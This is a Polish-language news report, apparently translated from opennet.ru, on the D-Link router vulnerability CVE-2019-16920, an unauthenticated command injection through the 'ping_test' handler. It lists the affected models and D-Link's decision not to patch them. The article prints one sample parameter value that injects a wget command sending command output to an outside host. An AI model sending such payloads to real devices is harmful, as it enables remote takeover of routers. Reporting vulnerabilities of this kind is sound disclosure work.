Luka w routerach D-Link, którą można zdalnie wykorzystać

W routerach bezprzewodowych D-Link zidentyfikowane niebezpieczna luka (CVE-2019-16920), co umożliwia zdalne wykonanie kodu po stronie urządzenia poprzez wysłanie specjalnego żądania do procedury obsługi „ping_test”, dostępnej bez uwierzytelniania.

Co ciekawe, zdaniem twórców oprogramowania, wywołanie „ping_test” powinno zostać wykonane dopiero po uwierzytelnieniu, ale w rzeczywistości jest wywoływane i tak niezależnie od zalogowania się do interfejsu internetowego. W szczególności w przypadku dostępu do skryptu Apply_sec.cgi i przekazania parametru „action=ping_test”, skrypt przekierowuje na stronę uwierzytelniania, ale jednocześnie wykonuje akcję związaną z ping_test. Do wykonania kodu wykorzystano kolejną lukę w samym ping_test, który wywołuje narzędzie ping bez odpowiedniego sprawdzenia poprawności adresu IP przesłanego do testów. Na przykład, aby wywołać narzędzie wget i przesłać wyniki polecenia „echo 1234” do hosta zewnętrznego, wystarczy podać parametr „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)”.

Luka w routerach D-Link, którą można zdalnie wykorzystać

Oficjalnie potwierdzono obecność luki w następujących modelach:

  • DIR-655 z oprogramowaniem 3.02b05 lub starszym;
  • DIR-866L z oprogramowaniem 1.03b04 lub starszym;
  • DIR-1565 z oprogramowaniem 1.01 lub starszym;
  • DIR-652 (nie podano informacji o problematycznych wersjach oprogramowania)

Okres wsparcia dla tych modeli już minął, więc D-Link oświadczył, która nie będzie wydawać dla nich aktualizacji eliminujących lukę, nie zaleca ich stosowania i zaleca wymianę na nowe urządzenia. W ramach obejścia bezpieczeństwa możesz ograniczyć dostęp do interfejsu internetowego tylko do zaufanych adresów IP.

Później odkryto, że luka ta również występowała ma wpływ modele DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 i DIR-825, dla których plany wydania aktualizacji nie są jeszcze znane.

Źródło: opennet.ru

Dodaj komentarz